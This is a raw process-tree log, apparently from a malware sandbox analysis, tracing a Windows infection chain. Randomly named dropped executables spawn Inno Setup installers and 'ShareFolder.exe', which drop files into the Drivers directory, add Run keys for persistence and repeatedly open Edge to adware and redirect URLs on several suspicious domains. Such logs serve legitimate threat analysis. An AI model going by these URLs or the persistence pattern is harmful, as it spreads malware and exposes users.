C:\Users\Admin\Pictures\Adobe Films\_jBQw_QihoQim7DMOHzM16TN.exe"C:\Users\Admin\Pictures\Adobe Films\_jBQw_QihoQim7DMOHzM16TN.exe"9⤵PID:7700
-
-
C:\Users\Admin\Pictures\Adobe Films\SPhHHgmoIuNWAEquliksedgo.exe"C:\Users\Admin\Pictures\Adobe Films\SPhHHgmoIuNWAEquliksedgo.exe"9⤵PID:7688
-
-
C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"9⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\is-84S07.tmp\LvP2JR61i9foyFZ2pnR1CRLZ.tmp"C:\Users\Admin\AppData\Local\Temp\is-84S07.tmp\LvP2JR61i9foyFZ2pnR1CRLZ.tmp" /SL5="$303EA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"10⤵
- Loads dropped DLL
PID:3584 -
C:\Users\Admin\AppData\Local\Temp\is-IME32.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-IME32.tmp\ShareFolder.exe" /S /UID=271011⤵
- Drops file in Drivers directory
PID:6336 -
C:\Users\Admin\AppData\Local\Temp\5d-3147c-c12-591b5-e8765c26e834d\Hamivapasi.exe"C:\Users\Admin\AppData\Local\Temp\5d-3147c-c12-591b5-e8765c26e834d\Hamivapasi.exe"12⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6732
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"9⤵PID:8120
-
C:\Users\Admin\AppData\Local\Temp\is-5VHNR.tmp\GVCbJgN4fvZ0RwrZvawYRPZB.tmp"C:\Users\Admin\AppData\Local\Temp\is-5VHNR.tmp\GVCbJgN4fvZ0RwrZvawYRPZB.tmp" /SL5="$60300,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"10⤵
- Loads dropped DLL
PID:7456 -
C:\Users\Admin\AppData\Local\Temp\is-O98KM.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-O98KM.tmp\ShareFolder.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:7112 -
C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe"C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe" /VERYSILENT12⤵PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\7f-cddff-8ce-d14a4-239f101d723df\Qekymoshati.exe"C:\Users\Admin\AppData\Local\Temp\7f-cddff-8ce-d14a4-239f101d723df\Qekymoshati.exe"12⤵PID:7468
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵PID:3436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:232
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵PID:35000
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:35032
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵PID:37704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:37732
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵PID:39856
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:39912
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵PID:41964
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:42008
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵PID:47184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:47232
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵PID:5956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:44052
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵PID:45748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:45780
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=313⤵PID:13260
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:13280
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968013⤵PID:15880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:15928
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=313⤵PID:19388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:19432
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317813⤵PID:21704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:21752
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46513⤵PID:24544
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:24580
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46613⤵PID:27460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:27488
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵PID:46908
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:47056
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵PID:7436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:7420
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵PID:32724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:9960
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵PID:35736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:35848
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵PID:35508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:36960
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵PID:39544
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0xdc,0xe0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:37648
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵PID:42100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:42260
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵PID:50332
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:47684
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=313⤵PID:37920
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:43672
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968013⤵PID:12480
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xc0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵PID:45900
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=313⤵PID:12272
-
